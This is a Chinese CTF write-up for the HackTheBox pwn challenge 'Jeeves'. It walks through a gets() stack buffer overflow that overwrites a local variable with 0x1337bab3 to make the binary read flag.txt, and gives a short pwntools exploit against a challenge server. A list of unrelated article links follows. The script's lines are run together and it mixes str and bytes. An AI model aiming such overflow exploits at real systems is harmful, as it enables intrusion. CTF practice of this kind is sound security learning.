文章目录

  • 概述
  • 题目概述
  • 基本信息获取
  • 使用gdb分析程序
  • 解题思路
  • 解题代码

概述

HackTheBox 网站CTF靶场PWN相关题目Jeeves,题目地址https://app.hackthebox.com/challenges/jeeves,主要考点为缓冲区溢出。

题目概述

下载附件Jeeves.zip并解压缩得到jeeves,对应的远程服务器实例为178.62.74.50:31534

基本信息获取

直接运行程序,输入test,得到一个回应

查看加固措施

查看程序中的字符串,发现有flag.txt

abin2 -z jeeves
[Strings]
nth paddr      vaddr      len size section type  string
―――――――――――――――――――――――――――――――――――――――――――――――――――――――
0   0x00002008 0x00002008 39  40   .rodata ascii Hello, good sir!\nMay I have your name?
1   0x00002030 0x00002030 36  37   .rodata ascii Hello %s, hope you have a good day!\n
2   0x00002055 0x00002055 8   9    .rodata ascii flag.txt
3   0x00002060 0x00002060 59  60   .rodata ascii Pleased to make your acquaintance. Here's a small gift: %s\n

使用gdb分析程序

查看main函数

发现通过gets函数接收输入,位置在rbp-0x40,在0x555555555236出有一个比较,比较rbp-4处的值与0x1337bab3,如果不相等,跳转到程序结束,如果相等,执行打开flag.txt的指令。

解题思路

利用溢出溢出到rbp-4处,修改其值为0x1337bab3,是比较相等,执行open函数读取flag.txt。

rbp-4rbp-0x40的距离为60

解题代码

from pwn import *# p = process('./jeeves')
p = remote('178.62.74.50',31534)offset = 60payload = 'A' * 60 + p64(0x1337bab3)p.sendline(payload)
p.interactive()

HackTheBox-Jeeves相关推荐

  1. sqlmap md5怎么解密_三十九,hackthebox渗透之DirBuster扫描路径及Sqlmap

    一.DirBuster扫描目录 hack the box是一个在线Web渗透实验平台,能帮助你提升渗透测试技能和黑盒测试技能,平台上有很多靶机,从易到难,各个级别的靶机都有.因为这些靶机放在平台上供大 ...

  2. Hackthebox(1)系列持续更新

    Hackthebox第一关 文章目录 Hackthebox第一关 一.Hackthebox配置openvpn 配置openvpn 二.第0层(简单) 终端弄好以后点击产卵机,然后会给你创建一个实例 问 ...

  3. HackTheBox MetaTwo 网站框架CVE获取用户shell和破解私钥提权

    题目网址: https://app.hackthebox.com/machines/MetaTwo 枚举 使用nmap枚举靶机 nmap -sC -sV -p- 10.10.11.186 扫到了域名, ...

  4. HackTheBox 如何使用

    如何开始? 1.到官网注册一个账号 https://www.hackthebox.com/ 2.验证自己的邮箱 3.下载 openvpn 4.到左边的 labs 实验室开始学习或直接点击 start ...

  5. HackTheBox –Craft实战

    HackTheBox –Craft ip:http://10.10.10.110/ 信息搜集 端口扫描:使用nmap扫描发现开了22(ssh)端口和443(http/ssl) 版本可从web网页上获取 ...

  6. CTF-Anubis HackTheBox 渗透测试(二)

    大家好,我是你们好朋友小峰.预计从今天开始,陆陆续续为大家推出       CTF-Horizontall HackTheBox 系列文章. 0x01 简介 Anubis是由作者4ndr34z在Hac ...

  7. Hackthebox:Arctic Walkthrough

    预备知识 使用了msfvenom,不想看的可以跳过 浏览器信息收集尤其是细节发现服务信息不能过度依赖工具 MS10-059.smbserver.jsp reverse shell 信息收集和获取立足点 ...

  8. hackthebox的网站使用教程

    Google浏览器下载 下载url:https://www.google.cn/chrome/ hackthebox网站 网站url:https://www.hackthebox.com/home 获 ...

  9. 小黑客,2020还没有邀请码注册 hackthebox ?reCAPTCHA验证码加载不出来?

    访问邀请码页面 https://www.hackthebox.eu/invite F12控制台输入 $.post('https://www.hackthebox.eu/api/invite/gener ...

  10. [Hackthebox]获取社区邀请码

    获取Hackthebox邀请码教程 登录社区首页后,下拉页面,点击Join按钮进入邀请页面.我们需要通过该页面展示的信息,获取邀请码以注册社区账号.这是进入训练社区的一个小挑战. 流程 可以直接通过浏 ...

最新文章

  1. 2020年球云计算市值或将达4490亿欧元
  2. 8000 字 + 21 张图,服务端高并发分布式架构 14 次演进之路
  3. C语言遥控器程序,红外遥控
  4. 【已解决】Nacos启动报错:java.io.IOException: java.lang.IllegalArgumentException: db.num is null
  5. GridView RowCommand事件中取得當前行
  6. 在NSUserDefaults中存储自定义类型的数据
  7. 为什么这本搜索引擎营销的书畅销呢?
  8. 纯CSS3技术 加载中
  9. 【jvm jdk】锁状态位之偏向锁
  10. Windows 10 使用Easy Sysprep V5 新版封装软件的图文封装教程
  11. c语言专业面试问题,c语言面试问题(共3篇).doc
  12. Latex 求职简历模版
  13. oracle查询备份存储路径,Oracle数据库备份和恢复(导出,导入)
  14. Kafka生产者、消费者的消息可靠性方案实现
  15. python for循环次数_Python for循环
  16. C语言中文网教程导航
  17. 常见的网站攻击与防御,道高一尺,魔高一丈
  18. 后浪小萌新Python --- 字典
  19. schema testdb didn‘t config tables,so you must set dataNode property!
  20. linux下文件怎么改名字,Linux文件名字批量修改步骤 Linux修改文件名的方法

热门文章

  1. 用username.github.io在github创建一个个人空间
  2. Python实现TOPSIS分析法(优劣解距离法)
  3. Redis底层数据结构详解(一)
  4. iOS AVFoundation
  5. 关于python格式对齐的问题_解决python对齐错误的方法
  6. 5611AH 数码管 引脚图
  7. 微信签到抽奖程序java源码_某宝买的微信抽奖签到墙源码,年会,学习源码--已经配置完成了,源码没问题,可直接用...
  8. 如何管理软件开发项目?
  9. 微软“黑屏”被严重误读
  10. 基于爬虫爬取的数据,完成数据展示网站